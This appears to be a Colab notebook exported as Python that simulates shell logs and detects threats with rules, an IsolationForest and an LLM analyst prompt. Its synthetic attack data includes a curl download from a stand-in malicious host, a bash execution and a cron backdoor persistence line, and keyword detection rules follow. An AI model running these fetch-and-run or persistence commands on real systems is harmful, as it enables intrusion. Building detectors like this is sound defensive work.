# -*- coding: utf-8 -*-
"""main.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1WktvUCBNYGXSaHNNhPtX9-i9yz8e0XHe

### **AI Threat Detector Simulator**

Create production like logs.
Note: In real world scenario, we will need to work on data cleanup to align it with the workable demo.
"""

import pandas as pd
import random
from datetime import datetime, timedelta

users = ["user1", "user2", "root"]

# Normal commands
normal_commands = [
    ("ls -la", "benign", None),
    ("vim file.txt", "benign", None),
    ("python app.py", "benign", None),
    ("ssh user@host", "benign", None),
]

# Attack chain mapped to MITRE
attack_chain = [
    {
        "command": "curl http://malicious.com/script.sh",
        "process": "curl",
        "stage": "Command and Control",
        "technique": "T1105"
    },
    {
        "command": "bash script.sh",
        "process": "bash",
        "stage": "Execution",
        "technique": "T1059"
    },
    {
        "command": "echo '* * * * * /tmp/backdoor.sh' > cron",
        "process": "cron",
        "stage": "Persistence",
        "technique": "T1053"
    }
]

data = []
start_time = datetime.now()

for session in range(30):
    timestamp = start_time + timedelta(minutes=session * 5)
    user = random.choice(users)

    if random.random() < 0.35:  # 35% attack sessions
        for step in attack_chain:
            data.append({
                "timestamp": timestamp,
                "session_id": session,
                "process": step["process"],
                "command": step["command"],
                "user": user,
                "attack_stage": step["stage"],
                "technique_id": step["technique"],
                "label": "suspicious"
            })
            timestamp += timedelta(seconds=40)
    else:
        for _ in range(random.randint(2, 5)):
            cmd, stage, tech = random.choice(normal_commands)
            data.append({
                "timestamp": timestamp,
                "session_id": session,
                "process": cmd.split()[0],
                "command": cmd,
                "user": user,
                "attack_stage": stage,
                "technique_id": tech,
                "label": "normal"
            })
            timestamp += timedelta(seconds=40)

df = pd.DataFrame(data)
df.head(20)

"""Model the detection logic with a scorer"""

from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import LabelEncoder

df_copy = df.copy()

# ---------------------------
# 1. RULE-BASED DETECTION
# ---------------------------

def rule_based_score(row):
    score = 0

    # Suspicious keywords
    if "curl" in row["command"] or "wget" in row["command"]:
        score += 2
    if "bash" in row["command"] and "http" in row["command"]:
        score += 3
    if "cron" in row["command"]:
        score += 3
    if row["user"] == "root":
        score += 1

    return score

df_copy["rule_score"] = df_copy.apply(rule_based_score, axis=1)

# ---------------------------
# 2. FEATURE ENGINEERING
# ---------------------------

le_process = LabelEncoder()
le_user = LabelEncoder()

df_copy["process_enc"] = le_process.fit_transform(df_copy["process"])
df_copy["user_enc"] = le_user.fit_transform(df_copy["user"])
df_copy["command_length"] = df_copy["command"].apply(len)

features = df_copy[["process_enc", "user_enc", "command_length"]]

# ---------------------------
# 3. ANOMALY DETECTION
# ---------------------------

model = IsolationForest(contamination=0.2, random_state=42)
df_copy["anomaly_score"] = model.fit_predict(features)

# Convert (-1 = anomaly, 1 = normal) → score
df_copy["anomaly_score"] = df_copy["anomaly_score"].apply(lambda x: 1 if x == -1 else 0)

# ---------------------------
# 4. FINAL SCORING
# ---------------------------

df_copy["final_score"] = df_copy["rule_score"] + df_copy["anomaly_score"]

# Flag suspicious
df_copy["flagged"] = df_copy["final_score"] >= 3

df_copy.head(20)

"""Check detection"""

df_copy["flagged"].value_counts()

"""View flagged cases"""

df_copy[df_copy["flagged"] == True].head(10)

"""GROQ LLM - Free Tier"""

!pip install groq

from google.colab import userdata
from groq import Groq

client = Groq(api_key=userdata.get("GROQ_API_KEY"))

def build_prompt(row):
    return f"""
You are a cybersecurity analyst.

Analyze this system event:

Command: {row['command']}
Process: {row['process']}
User: {row['user']}

Respond in this format:

Explanation:
- What does this command do?

Suspicion:
- Why could this be malicious?

Attack Stage:
- Likely stage (Execution, Persistence, etc.)

Next Steps:
- What should be investigated next?
"""

def analyze_with_llm(row):
    prompt = build_prompt(row)

    response = client.chat.completions.create(
        model="llama-3.3-70b-versatile",
        messages=[
            {"role": "system", "content": "You are an expert cybersecurity analyst."},
            {"role": "user", "content": prompt}
        ],
        temperature=0.2
    )

    return response.choices[0].message.content

"""Sample LLM Test"""

sample = df_copy[df_copy["flagged"] == True].iloc[0]
print(analyze_with_llm(sample))

"""Check logs"""

def get_session_logs(df, row):
    session_id = row["session_id"]
    return df[df["session_id"] == session_id]

"""Build Agent"""

def build_agent_prompt(session_df):
    logs = ""

    for _, r in session_df.iterrows():
        logs += f"- {r['timestamp']} | {r['process']} | {r['command']} | user={r['user']}\n"

    return f"""
You are a cybersecurity analyst investigating a sequence of system events.

Here is the full activity timeline:
{logs}

Instructions:
- Avoid generic explanations
- Tailor reasoning to this specific session (user, commands, sequence)
- Consider user privilege, frequency, and system-level impact

Tasks:

1. Summary of Events
- What happened in this session?

2. Attack Pattern Identification
- Is this an attack? What type?

3. Attack Chain Explanation
- Explain step-by-step what the attacker is doing

4. MITRE ATT&CK Mapping
- Map each step to attack stages (Execution, Persistence, etc.)

5. Detection Signals
- What signals triggered detection?
  (e.g., unusual command, root execution, persistence mechanism)

6. Risk Level
- Low / Medium / High / Critical (justify briefly)

7. Confidence Level
- Low / Medium / High (justify briefly)

8. Suggested Next Steps
- What should a security team do next?

Be structured, specific, and concise.
"""

"""Define agent investigation"""

def investigate_with_agent(df, row):
    session_df = df[df["session_id"] == row["session_id"]]
    prompt = build_agent_prompt(session_df)

    response = client.chat.completions.create(
        model="llama-3.3-70b-versatile",
        messages=[
            {"role": "system", "content": "You are an expert cybersecurity analyst."},
            {"role": "user", "content": prompt}
        ],
        temperature=0.2
    )

    return response.choices[0].message.content

unique_sessions = df_copy[df_copy["flagged"] == True]["session_id"].unique()
unique_sessions

"""Make Agent Investigate"""

reports = []

for session_id in unique_sessions:
    row = df_copy[df_copy["session_id"] == session_id].iloc[0]

    report = investigate_with_agent(df_copy, row)

    reports.append({
        "session_id": int(session_id),
        "report": report
    })

reports

"""Save reults to JSON"""

import json

with open("reports.json", "w") as f:
    json.dump(reports, f, indent=2)

print("Saved to reports.json")

"""Evaluation"""

# True labels vs predicted flags
y_true = df_copy["label"].apply(lambda x: 1 if x == "suspicious" else 0)
y_pred = df_copy["flagged"].apply(lambda x: 1 if x else 0)

from sklearn.metrics import classification_report

print(classification_report(y_true, y_pred))

"""Define detection signals"""

def extract_detection_signals(row):
    signals = []

    if "curl" in row["command"] or "wget" in row["command"]:
        signals.append("External script download")

    if "bash" in row["command"]:
        signals.append("Script execution")

    if "cron" in row["command"]:
        signals.append("Persistence mechanism")

    if row["user"] == "root":
        signals.append("High privilege execution")

    if row["anomaly_score"] == 1:
        signals.append("Anomalous behavior (ML)")

    return signals


df_copy["detection_signals"] = df_copy.apply(extract_detection_signals, axis=1)

df_copy[df_copy["flagged"] == True][["command", "detection_signals"]].head()